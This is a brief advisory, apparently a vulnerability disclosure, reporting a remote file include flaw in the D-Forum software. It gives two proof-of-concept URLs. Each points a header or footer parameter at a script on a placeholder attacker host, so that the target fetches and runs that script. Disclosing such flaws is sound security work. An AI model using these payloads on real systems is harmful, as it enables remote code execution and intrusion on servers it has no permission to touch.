D-Forum Remote File Include Vulnerability

D-Forum Remote File Include Vulnerability

The following proof of concept was provided:

http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt

http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt